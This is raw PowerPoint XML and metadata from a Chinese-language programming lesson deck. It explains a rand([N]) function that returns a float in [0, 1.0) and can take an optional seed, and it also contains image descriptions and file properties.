          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7327075" y="65195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F2E3101-BBD3-4145-BD09-92199C1D99AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1900956" y="2114305"/>
            <a:ext cx="5876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N </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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是可选提供的，如果提供了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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N</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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，则会设定</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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N</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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为一个</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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SEED</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" alt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280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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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预备函数 </a:t>
            </a:r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kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rand([N])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E14782-4650-2440-AC41-0CF73AC29A3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900956" y="1599269"/>
            <a:ext cx="9855615" cy="355624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CN" dirty="0"/>
              <a:t>rand([N]) - </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回一个随机浮点数 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，范围是 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0&lt;=v&lt;1.0</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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29" y="1510393"/>
            <a:ext cx="444500" cy="4445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12BFCAF-184C-F044-A73F-E5B2D25C772F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7327075" y="65195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 descr="图片包含 游戏机, 截图, 鸟&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72BEC5AB-CB9A-1A4E-AF0B-EC7B7F8FC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040" y="2287847"/>
            <a:ext cx="5162960" cy="4145522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9" descr="图片包含 游戏机, 截图, 鸟&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC919764-E478-3D4C-BBFC-AA15A159CD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6113" y="2287846"/>
            <a:ext cx="5162961" cy="414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50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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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预备函数 </a:t>
            </a:r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kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rand([N])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E14782-4650-2440-AC41-0CF73AC29A3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900956" y="1599269"/>
            <a:ext cx="9855615" cy="355624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CN" dirty="0"/>
              <a:t>rand([N]) - </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回一个随机浮点数 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，范围是 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0&lt;=v&lt;1.0</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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29" y="1510393"/>
            <a:ext cx="444500" cy="4445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12BFCAF-184C-F044-A73F-E5B2D25C772F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7327075" y="65195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3F86276-7B09-AD41-BE8A-495894876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277" y="2718865"/>
            <a:ext cx="10527445" cy="184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813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3809</TotalTime>
  <Words>2920</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>302</Paragraphs>
  <Slides>49</Slides>
  <Notes>32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8" baseType="lpstr">
      <vt:lpstr>Alibaba PuHuiTi</vt:lpstr>
      <vt:lpstr>Alibaba PuHuiTi Light</vt:lpstr>
      <vt:lpstr>Alibaba PuHuiTi Medium</vt:lpstr>
      <vt:lpstr>Microsoft YaHei UI</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>CorelDRAW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课后作业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课后作业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课后作业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19475</dc:creator>
  <cp:lastModifiedBy>张 浩</cp:lastModifiedBy>
  <cp:revision>317</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-08T02:18:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-16T03:15:05Z</dcterms:modified>
</cp:coreProperties>
</file>